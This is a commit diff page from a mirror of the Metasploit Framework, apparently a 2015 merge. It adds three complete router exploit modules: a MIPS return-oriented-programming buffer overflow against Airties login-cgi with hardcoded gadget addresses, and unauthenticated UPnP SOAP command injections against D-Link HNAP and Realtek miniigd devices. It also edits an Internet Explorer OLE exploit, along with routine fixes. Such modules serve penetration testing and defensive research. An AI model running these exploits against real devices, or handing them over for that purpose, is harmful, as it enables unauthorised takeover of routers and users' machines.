infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'upstream-master' into bapv2

bug/bundler_fix
wchen-r7 2015-05-29 14:59:04 -05:00
parent 6be363d82a 1be04a9e7e
commit 13779adab4
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
11 changed files with 500 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.travis.yml
View File

@ -22,7 +22,7 @@ before_script:
- bundle exec rake db:migrate
script:
# fail build if db/schema.rb update is not committed
- git diff --exit-code && bundle exec rake $RAKE_TASKS
- git diff --exit-code db/schema.rb && bundle exec rake $RAKE_TASKS
sudo: false
rvm:
- '2.1.6'

32
lib/msf/core/rpc/v10/rpc_session.rb
View File

@ -395,6 +395,38 @@ class RPC_Session < RPC_Base
rpc_meterpreter_run_single( sid, "run #{data}")
end
# Changes the Transport of a given Meterpreter Session
#
# @param sid [Fixnum] The Session ID of the `Msf::Session`
# @option opts [String] :transport The transport protocol to use (e.g. reverse_tcp, reverse_http, bind_tcp etc)
# @option opts [String] :lhost The LHOST of the listener to use
# @option opts [String] :lport The LPORT of the listener to use
# @option opts [String] :ua The User Agent String to use for reverse_http(s)
# @option opts [String] :proxy_host The address of the proxy to route transport through
# @option opts [String] :proxy_port The port the proxy is listening on
# @option opts [String] :proxy_type The type of proxy to use
# @option opts [String] :proxy_user The username to authenticate to the proxy with
# @option opts [String] :proxy_pass The password to authenticate to the proxy with
# @option opts [String] :comm_timeout Connection timeout in seconds
# @option opts [String] :session_exp Session Expiration Timeout
# @option opts [String] :retry_total Total number of times to retry etsablishing the transport
# @option opts [String] :retry_wait The number of seconds to wait between retries
# @option opts [String] :cert Path to the SSL Cert to use for HTTPS
# @return [Boolean] whether the transport was changed successfully
def rpc_meterpreter_transport_change(sid,opts={})
session = _valid_session(sid,"meterpreter")
real_opts = {}
opts.each_pair do |key, value|
real_opts[key.to_sym] = value
end
real_opts[:uuid] = session.payload_uuid
result = session.core.transport_change(real_opts)
if result == true
rpc_stop(sid)
end
result
end
# Returns the separator used by the meterpreter.
#

9
lib/rex/exploitation/cmdstager/echo.rb
View File

@ -27,9 +27,12 @@ class CmdStagerEcho < CmdStagerBase
#
def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, "/")
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
unless opts[:temp].empty?
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
end
# by default use the 'hex' encoding
opts[:enc_format] = opts[:enc_format] || 'hex'

151
modules/exploits/linux/http/airties_login_cgi_bof.rb Normal file
View File

@ -0,0 +1,151 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Airties login-cgi Buffer Overflow',
'Description' => %q{
This module exploits a remote buffer overflow vulnerability on several Airties routers.
The vulnerability exists in the handling of HTTP queries to the login cgi with long
redirect parameters. The vulnerability doesn't require authentication. This module has
been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
},
'Author' =>
[
'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => ['linux'],
'Arch' => ARCH_MIPSBE,
'References' =>
[
['EDB', '36577'],
['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
],
'Targets' =>
[
[ 'AirTies_Air5650v3TT_FW_1.0.2.0',
{
'Offset' => 359,
'LibcBase' => 0x2aad1000,
'RestoreReg' => 0x0003FE20, # restore s-registers
'System' => 0x0003edff, # address of system-1
'CalcSystem' => 0x000111EC, # calculate the correct address of system
'CallSystem' => 0x00041C10, # call our system
'PrepareSystem' => 0x000215b8 # prepare $a0 for our system call
}
]
],
'DisclosureDate' => 'Mar 31 2015',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => '/cgi-bin/login',
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /login.html\?ErrorCode=2/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Accessing the vulnerable URL...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 100
)
end
def prepare_shellcode(cmd)
shellcode = rand_text_alpha_upper(target['Offset']) # padding
shellcode << [target['LibcBase'] + target['RestoreReg']].pack("N") # restore registers with controlled values
# 0003FE20 lw $ra, 0x48+var_4($sp)
# 0003FE24 lw $s7, 0x48+var_8($sp)
# 0003FE28 lw $s6, 0x48+var_C($sp)
# 0003FE2C lw $s5, 0x48+var_10($sp)
# 0003FE30 lw $s4, 0x48+var_14($sp)
# 0003FE34 lw $s3, 0x48+var_18($sp)
# 0003FE38 lw $s2, 0x48+var_1C($sp)
# 0003FE3C lw $s1, 0x48+var_20($sp)
# 0003FE40 lw $s0, 0x48+var_24($sp)
# 0003FE44 jr $ra
# 0003FE48 addiu $sp, 0x48
shellcode << rand_text_alpha_upper(36) # padding
shellcode << [target['LibcBase'] + target['System']].pack('N') # s0 - system address-1
shellcode << rand_text_alpha_upper(16) # unused registers $s1 - $s4
shellcode << [target['LibcBase'] + target['CallSystem']].pack('N') # $s5 - call system
# 00041C10 move $t9, $s0
# 00041C14 jalr $t9
# 00041C18 nop
shellcode << rand_text_alpha_upper(8) # unused registers $s6 - $s7
shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N') # write sp to $a0 -> parameter for call to system
# 000215B8 addiu $a0, $sp, 0x20
# 000215BC lw $ra, 0x1C($sp)
# 000215C0 jr $ra
# 000215C4 addiu $sp, 0x20
shellcode << rand_text_alpha_upper(28) # padding
shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N') # add 1 to s0 (calculate system address)
# 000111EC move $t9, $s5
# 000111F0 jalr $t9
# 000111F4 addiu $s0, 1
shellcode << cmd
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/cgi-bin/login',
'encode_params' => false,
'vars_post' => {
'redirect' => shellcode,
'user' => rand_text_alpha(5),
'password' => rand_text_alpha(8)
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

2
modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
View File

@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
'Arch' => ARCH_MIPSBE
}
],
],

117
modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb Normal file
View File

@ -0,0 +1,117 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
'Description' => %q{
Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
interface. Since it is a blind OS command injection vulnerability, there is no
output for the executed command. This module has been tested on a DIR-645 device.
The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
},
'Author' =>
[
'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
'Craig Heffner', # independent Vulnerability discovery on different other routers
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
],
'DisclosureDate' => 'Feb 13 2015',
'Privileged' => true,
'Platform' => 'linux',
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian', # unknown if there are BE devices out there ... but in case we have a target
{
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
uri = '/HNAP1/'
soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
})
if res && [200].include?(res.code) && res.body =~ /D-Link/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 200,
:temp => ''
)
end
def execute_command(cmd, opts)
uri = '/HNAP1/'
cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'headers' => {
'SOAPAction' => soap_action,
}
}, 3)
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end

2
modules/exploits/linux/http/fritzbox_echo_exec.rb
View File

@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
'Arch' => ARCH_MIPSBE
}
],
],

167
modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb Normal file
View File

@ -0,0 +1,167 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
'Description' => %q{
Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
there is no output for the executed command. This module has been tested successfully on a
Trendnet TEW-731BR router with emulation.
},
'Author' =>
[
'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-8361'],
['ZDI', '15-155'],
['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']
],
'DisclosureDate' => 'Apr 24 2015',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
[ 'MIPS Little Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSLE
}
],
[ 'MIPS Big Endian',
{
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE
}
]
],
'DefaultTarget' => 0
))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
register_options(
[
Opt::RPORT(52869) # port of UPnP SOAP webinterface
], self.class)
end
def check
begin
res = send_request_cgi({
'uri' => '/picsdesc.xml'
})
if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/
return Exploit::CheckCode::Detected
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
execute_cmdstager(
:flavor => :echo,
:linemax => 50,
:nodelete => true
)
end
def execute_command(cmd, opts)
uri = '/wanipcn.xml'
soap_action = 'urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
data_cmd = '<?xml version="1.0"?>' + build_soap_req
begin
res = send_request_cgi({
'uri' => uri,
'vars_get' => {
'service' => 'WANIPConn1'
},
'ctype' => 'text/xml',
'method' => 'POST',
'headers' => {
'SOAPAction' => soap_action
},
'data' => data_cmd.gsub(/CMD_HERE/, "`#{cmd.gsub(/\\/, '\\\\\\\\\\')}`")
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def build_soap_req
new_external_port = rand(32767) + 32768
new_internal_port = rand(32767) + 32768
xml = Document.new
xml.add_element(
'SOAP-ENV:Envelope',
{
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'SOAP-ENV:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/'
})
xml.root.add_element('SOAP-ENV:Body')
body = xml.root.elements[1]
body.add_element(
'm:AddPortMapping',
{
'xmlns:m' => 'urn:schemas-upnp-org:service:WANIPConnection:1'
})
port_mapping = body.elements[1]
port_mapping.add_element('NewLeaseDuration')
port_mapping.add_element('NewInternalClient')
port_mapping.add_element('NewEnabled')
port_mapping.add_element('NewExternalPort')
port_mapping.add_element('NewRemoteHost')
port_mapping.add_element('NewProtocol')
port_mapping.add_element('NewInternalPort')
port_mapping.elements['NewLeaseDuration'].text = ''
port_mapping.elements['NewInternalClient'].text = 'CMD_HERE'
port_mapping.elements['NewEnabled'].text = '1'
port_mapping.elements['NewExternalPort'].text = "#{new_external_port}"
port_mapping.elements['NewRemoteHost'].text = ''
port_mapping.elements['NewProtocol'].text = 'TCP'
port_mapping.elements['NewInternalPort'].text = "#{new_internal_port}"
xml.to_s
end
end

2
modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
View File

@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'MIPS Big Endian', # unknown if there are big endian devices out there
{
'Platform' => 'linux',
'Arch' => ARCH_MIPS
'Arch' => ARCH_MIPSBE
}
]
],

15
modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
View File

@ -19,8 +19,9 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
Windows 10, and there is no patch for Windows XP or older.
The vulnerability is known to affect Internet Explorer 3.0 until version 11 within
Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will
only target Windows XP and Windows 7 box due to the Powershell limitation.
Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
newer Windows systems, the exploit will try using Powershell instead.
@ -56,9 +57,9 @@ class Metasploit4 < Msf::Exploit::Remote
}
],
[
'Other Windows x86',
'Windows 7',
{
'os_name' => OperatingSystems::Match::WINDOWS,
'os_name' => OperatingSystems::Match::WINDOWS_7
}
]
],
@ -84,6 +85,7 @@ class Metasploit4 < Msf::Exploit::Remote
register_options(
[
OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
], self.class )
end
@ -358,6 +360,11 @@ end function
end
def on_request_exploit(cli, request, target_info)
if get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !datastore['AllowPowershellPrompt']
send_not_found(cli)
return
end
case request.uri
when /\.gif/
if get_target.name =~ OperatingSystems::Match::WINDOWS_XP

14
msfvenom
View File

@ -54,7 +54,10 @@ require 'msf/core/payload_generator'
opts = {}
datastore = {}
opt = OptionParser.new
opt.banner = "Usage: #{$0} [options] <var=val>"
banner = "MsfVenom - a Metasploit standalone payload generator.\n"
banner << "Also a replacement for msfpayload and msfencode.\n"
banner << "Usage: #{$0} [options] <var=val>"
opt.banner = banner
opt.separator('')
opt.separator('Options:')
@ -292,7 +295,14 @@ if __FILE__ == $0
$stdout.puts dump_encoders
$stdout.puts dump_nops
else
$stderr.puts "Invalid module type"
if mod == 'payload'
question = ". Do you mean 'payloads'?"
elsif mod == 'encoder'
question = ". Do you mean 'encoders'?"
elsif mod == 'nop'
quesetion = ". Do you mean 'nops'?"
end
$stderr.puts "Invalid module type#{question}"
end
end
exit(0)